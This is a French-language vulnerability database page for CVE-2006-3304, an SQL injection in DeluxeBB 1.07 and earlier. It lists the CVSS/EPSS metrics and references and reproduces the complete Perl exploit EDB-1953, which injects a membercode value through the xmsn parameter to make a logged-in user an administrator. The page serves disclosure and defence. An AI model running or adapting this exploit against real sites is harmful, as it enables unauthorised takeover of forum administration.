CVE-2006-3304 : Détail

CVE-2006-3304

1.99%V4
Network
2006-06-28
23h00 +00:00
2018-10-18
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in cp.php in DeluxeBB 1.07 and earlier allows remote attackers to execute arbitrary SQL commands via the xmsn parameter.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1953

Date de publication : 2006-06-24 22h00 +00:00
Auteur : Hessam-x
EDB Vérifié : Yes

#!/usr/bin/perl # DeluxeBB <= 1.07 Create Admin Exploit # ## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net # ./2006-6-25 ### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV[0]; $uname = $ARGV[1]; $passwd = $ARGV[2]; $url = "http://".$host; print q( ########################################################### # DeluxeBB <= 1.07 Create Admin Exploit # # www.hackerz.ir - www.h4ckerz.com # ################### Coded By Hessam-x ##################### ); if (@ARGV < 3) { print " # usage : hx.pl [host&path] [uname] [pass]\n"; print " # E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; exit(); } print " [~] User/Password : $uname/$passwd \n"; print " [~] Host : $host \n"; print " [~] Login ... "; # Login In DeluxeBB <= 1.07 Create Admin Exploit $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $xpl->cookie_jar( $cookie_jar ); $res = $xpl->post($url.'misc.php', Content => [ "sub" => "login", "name" => "$uname", "password" => "$passwd", "submit" => "Log-in", "redirect" => "", "expiry" => "990090909", ],); if($cookie_jar->as_string =~ /memberpw=(.*?);/) { print "successfully .\n"; } else { print "UNsuccessfully !\n"; print " [-] Can not Login In $host !\n"; print $cookie_jar->as_string; exit(); } # Creat Admin :) $req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update'); $tst = $xpl->get($url.'index.php'); if ($tst->as_string =~ /Admin Cp/) { print " [+] You Are Admin Now !!"; } else { print " [-] Exploit Failed !"; } # milw0rm.com [2006-06-25]

Products Mentioned

Configuraton 0

Deluxebb>>Deluxebb >> Version To (including) 1.07

Références

http://securitytracker.com/id?1016384
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/20813
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/2530
Tags : vdb-entry, x_refsource_VUPEN
https://www.exploit-db.com/exploits/1953
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/18648
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/1180
Tags : third-party-advisory, x_refsource_SREASON